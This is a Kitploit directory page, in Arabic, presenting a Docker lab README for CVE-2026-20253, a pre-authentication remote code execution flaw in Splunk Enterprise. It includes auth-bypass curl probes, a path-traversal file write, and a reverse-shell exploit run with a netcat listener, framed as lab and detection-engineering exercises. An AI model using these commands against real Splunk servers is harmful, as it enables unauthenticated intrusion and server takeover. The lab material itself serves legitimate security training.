Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-20253 — بيئة مختبر Docker مع استغلال PoC ومدقق لـ CVE-2026-20253، وهو RCE قبل المصادقة في Splunk Enterprise عبر خدمة PostgreSQL الجانبية. | Kitploit
أدوات/GitHubGitHub/ivanesk315/cve-2026-20253
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمالفريق الأحمرمختبرات وتدريب عملي
GitHubivanesk315/cve-2026-20253

CVE-2026-20253

بيئة مختبر Docker مع استغلال PoC ومدقق لـ CVE-2026-20253، وهو RCE قبل المصادقة في Splunk Enterprise عبر خدمة PostgreSQL الجانبية.

عرض المستودع
منذ 0 أياملم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

بيئة مختبر CVE-2026-20253

تنفيذ تعليمات برمجية عن بُعد قبل المصادقة في Splunk Enterprise عبر خدمة PostgreSQL الجانبية

CVECVE-2026-20253
CVSS9.8 (حرج)
النوعتنفيذ تعليمات برمجية عن بُعد دون مصادقة
CWECWE-306: غياب المصادقة لوظيفة حرجة
المنتجSplunk Enterprise 10.0.x / 10.2.x

إخلاء المسؤولية: هذا المختبر مخصص للبحث الأمني المصرّح به والتعليم واختبار الاختراق فقط. لا تستخدمه ضد أنظمة لا تملكها أو لا تملك تفويضًا صريحًا لاختبارها.


معمارية المختبر

root@kitploit:~
┌──────────────────────────────────────────────────────┐
│                  Docker Network: cve-lab             │
│                  Subnet: 172.20.0.0/24               │
│                                                      │
│  ┌─────────────────────┐   ┌──────────────────────┐  │
│  │  splunk-vulnerable   │   │  attacker            │  │
│  │  172.20.0.10         │   │  172.20.0.50         │  │
│  │                      │   │                      │  │
│  │  Splunk 10.2.3       │   │  Python 3.11         │  │
│  │  Port 8000 (Web)     │   │  nmap, netcat        │  │
│  │  Port 8089 (API)     │   │  postgresql-client   │  │
│  │  Port 8088 (HEC)     │   │  tcpdump             │  │
│  └─────────────────────┘   └──────────────────────┘  │
│                                                      │
│  ┌─────────────────────┐  (optional, profile: patched)│
│  │  splunk-patched      │                             │
│  │  172.20.0.11         │                             │
│  │  Splunk 10.2.4       │                             │
│  │  Port 8001 (Web)     │                             │
│  └─────────────────────┘                             │
└──────────────────────────────────────────────────────┘

المتطلبات الأساسية

  • Docker و Docker Compose
  • Git
  • ذاكرة RAM بسعة 8GB أو أكثر (يتطلب Splunk ذاكرة كبيرة)
  • اتصال بالإنترنت (لسحب صور Docker)

البدء السريع

1. تشغيل المختبر المعرّض للثغرة

root@kitploit:~
# Start Splunk vulnerable + attacker
docker-compose up -d

# Wait for Splunk to initialize (~2-3 minutes)
docker-compose logs -f splunk-vulnerable
# Look for: "Ansible playbook complete, will begin polling for Splunk On..."
# Then:     "Splunk is ready"

2. التحقق من تشغيل Splunk

  • افتح المتصفح: http://localhost:8000
  • تسجيل الدخول: admin / ChangeMeNow!

3. تشغيل فاحص الثغرة

root@kitploit:~
# From host machine
docker exec -it attacker python checker.py -t http://172.20.0.10:8000 -k

# Or enter the attacker container
docker exec -it attacker bash
cd /opt/exploit
python checker.py -t http://172.20.0.10:8000 -k

4. تشغيل استغلال PoC

root@kitploit:~
# Enter attacker container
docker exec -it attacker bash

# Check vulnerability
python poc.py -t http://172.20.0.10:8000 --check -k

# Full RCE exploit (start listener first in another terminal)
# Terminal 1 - Listener:
docker exec -it attacker nc -lvnp 4444

# Terminal 2 - Exploit:
docker exec -it attacker python poc.py \
    -t http://172.20.0.10:8000 \
    --rce \
    --lhost 172.20.0.50 \
    --lport 4444 \
    -k

5. (اختياري) تشغيل النسخة المُرقّعة للمقارنة

root@kitploit:~
docker-compose --profile patched up -d splunk-patched

# Test against patched instance (should return NOT VULNERABLE)
docker exec -it attacker python checker.py -t http://172.20.0.11:8000 -k

تمارين المختبر

التمرين 1: الاستطلاع وتحديد الثغرة

الهدف: تحديد نقاط نهاية خدمة PostgreSQL الجانبية والتحقق من تجاوز المصادقة.

root@kitploit:~
# Scan Splunk ports
nmap -sV 172.20.0.10 -p 8000,8089,8088

# Probe sidecar endpoints manually with curl
curl -v -k -u ":" "http://172.20.0.10:8000/en-US/splunkd/__raw/v1/postgres/health"
curl -v -k -u ":" "http://172.20.0.10:8000/en-US/splunkd/__raw/v1/postgres/status"
curl -v -k -u ":" "http://172.20.0.10:8000/en-US/splunkd/__raw/v1/postgres/recovery/backup"

أسئلة:

  • ما رموز حالة HTTP التي تلاحظها؟
  • إلى ماذا يُفكّ ترميز Authorization: Basic Og==؟
  • لماذا تشير استجابة 400 إلى وجود ثغرة (مقابل 401)؟

التمرين 2: بدائية كتابة الملفات

الهدف: إثبات إنشاء ملفات عشوائية على خادم Splunk.

root@kitploit:~
# Create a test file via the backup endpoint
curl -k -X POST -u ":" \
  "http://172.20.0.10:8000/en-US/splunkd/__raw/v1/postgres/recovery/backup?backupFile=../../../../../../tmp/pwned"

# Verify the file was created
docker exec splunk-vulnerable ls -la /tmp/pwned

التمرين 3: سلسلة RCE الكاملة

الهدف: تحقيق تنفيذ التعليمات البرمجية على خادم Splunk.

  1. ابدأ مستمع netcat على جهاز المهاجم
  2. شغّل استغلال PoC مع العلامة --rce
  3. تحقق من اتصال الصدفة العكسية
  4. افحص الأذونات التي تمتلكها الصدفة (whoami، id، ls /opt/splunk/etc/)

التمرين 4: تحليل فرق الترقيع

الهدف: فهم ما تغيّر بين النسختين المعرّضة للثغرة والمُرقّعة.

root@kitploit:~
# Start both vulnerable and patched instances
docker-compose --profile patched up -d

# Compare responses
curl -v -k -u ":" "http://172.20.0.10:8000/en-US/splunkd/__raw/v1/postgres/health"  # 400
curl -v -k -u ":" "http://172.20.0.11:8000/en-US/splunkd/__raw/v1/postgres/health"  # 401

# Diff the relevant Splunk configuration/code
docker exec splunk-vulnerable cat /opt/splunk/etc/apps/splunk_httpinput/default/inputs.conf
docker exec splunk-patched cat /opt/splunk/etc/apps/splunk_httpinput/default/inputs.conf

التمرين 5: هندسة الكشف

الهدف: إنشاء قواعد كشف لهذه الثغرة.

  1. فعّل تسجيل Splunk الداخلي على النسخة المعرّضة للثغرة
  2. شغّل الاستغلال
  3. ابحث في index=_internal عن آثار الهجوم
  4. اكتب استعلامات كشف SPL (انظر report/ANALYSIS.md القسم 6)
  5. اختبر عمليات الكشف الخاصة بك ضد الاستغلال

بنية الملفات

root@kitploit:~
CVE-2026-20253/
├── README.md                    # This file
├── docker-compose.yml           # Lab environment definition
├── attacker/
│   ├── Dockerfile               # Attacker container build
│   └── requirements.txt         # Python dependencies
├── exploit/
│   ├── checker.py               # Vulnerability checker script
│   ├── poc.py                   # PoC exploit (auth bypass → file write → RCE)
│   └── requirements.txt        # Python dependencies
└── report/
    └── ANALYSIS.md              # Root cause analysis & full report

نصائح تصحيح الأخطاء

حاوية Splunk لا تبدأ

root@kitploit:~
docker-compose logs splunk-vulnerable
# Common fix: increase Docker memory to 8GB+

التحقق من تشغيل خدمة PostgreSQL الجانبية

root@kitploit:~
docker exec splunk-vulnerable ps aux | grep postgres
docker exec splunk-vulnerable netstat -tlnp | grep 5435

فحص سجلات Splunk الداخلية

root@kitploit:~
docker exec splunk-vulnerable cat /opt/splunk/var/log/splunk/splunkd.log | tail -50

التحقق من نص الإدخال المعياري الهدف

root@kitploit:~
docker exec splunk-vulnerable cat /opt/splunk/etc/apps/splunk_secure_gateway/bin/ssg_enable_modular_input.py

التقاط حركة الشبكة للتحليل

root@kitploit:~
docker exec attacker tcpdump -i eth0 -w /opt/exploit/capture.pcap host 172.20.0.10

التنظيف

root@kitploit:~
# Stop and remove all containers
docker-compose --profile patched down

# Remove volumes (delete all Splunk data)
docker-compose --profile patched down -v

# Remove Docker images
docker rmi splunk/splunk:10.2.3 splunk/splunk:10.2.4

المراجع

  • تحليل السبب الجذري الكامل
  • إشعار Splunk الأمني SVD-2026-0610
  • تحليل وإثبات مفهوم من WatchTowr Labs
  • كتالوج CISA KEV
  • التحليل التقني من Picus Security
تنزيل الأداة